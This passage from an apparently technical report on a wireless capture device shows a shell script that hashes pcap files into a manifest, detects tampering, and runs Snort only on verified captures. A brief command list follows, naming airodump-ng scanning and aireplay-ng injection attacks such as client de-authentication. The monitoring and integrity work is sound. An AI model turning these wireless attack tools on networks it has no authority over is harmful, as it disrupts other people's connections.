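    verify_manifest "$1" || { echo "manifest mismatch, refusing to analyze" >&2; return 1; }
    for f in "$1"/*.pcap; do
        snort -q -c /etc/snort/snort.conf -A console -r "$f"
    done
}

# make_demo_dir: constructed sample data, two empty but valid pcap files
# (24-byte global header: magic 0xa1b2c3d4, v2.4, snaplen 65535, DLT_EN10MB)
make_demo_dir() {
    d=$(mktemp -d)
    for n in 1 2; do
        printf '\324\303\262\241\002\000\004\000\000\000\000\000\000\000\000\000\377\377\000\000\001\000\000\000' \
            > "$d/capture-demo-$n.pcap"
    done
    echo "$d"
}

DEMO=$(make_demo_dir)
write_manifest "$DEMO"
verify_manifest "$DEMO" && echo "manifest verified for $DEMO"
printf 'tampered' >> "$DEMO/capture-demo-2.pcap"
verify_manifest "$DEMO" || echo "tampering detected in $DEMO/capture-demo-2.pcap"
```

On the device the sequence is start_capture at0, then periodically write_manifest and ship_captures on the finished files; on the server, analyze_captures refuses to run Snort over anything whose hash no longer matches the manifest that travelled with it.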
Other Commands

    iwconfig wlan0 channel x
        Changes the channel of wlan0 (and all virtual interfaces on it) to x
    airodump-ng mon0
        Dumps a wireless network scan; very useful for gathering information on nearby networks
    aireplay-ng
        Offers various injection attacks, including client de-authentication
Section 4: Example Script

The quick start configuration script is listed in full in Appendix B (Setup/Configuration Script) of the formal report above.